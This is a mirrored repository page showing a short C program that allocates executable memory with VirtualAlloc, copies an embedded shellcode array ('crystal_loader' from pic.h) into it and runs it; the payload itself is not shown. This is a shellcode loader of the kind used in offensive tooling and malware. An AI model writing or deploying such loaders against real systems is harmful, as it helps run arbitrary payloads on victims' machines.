mirror of
https://github.com/k1ng0fn0th1ng/reflectra
synced 2026-06-21 13:55:04 +00:00
15 lines
332 B
C
15 lines
332 B
C
#include <windows.h>
|
|
#include "pic.h"
|
|
|
|
int main()
|
|
{
|
|
PVOID pShellcode = VirtualAlloc(NULL, crystal_loader_len,
|
|
MEM_COMMIT | MEM_RESERVE,
|
|
PAGE_EXECUTE_READWRITE);
|
|
|
|
memcpy(pShellcode, crystal_loader, crystal_loader_len);
|
|
|
|
((void(*)())pShellcode)();
|
|
|
|
return 0;
|
|
} |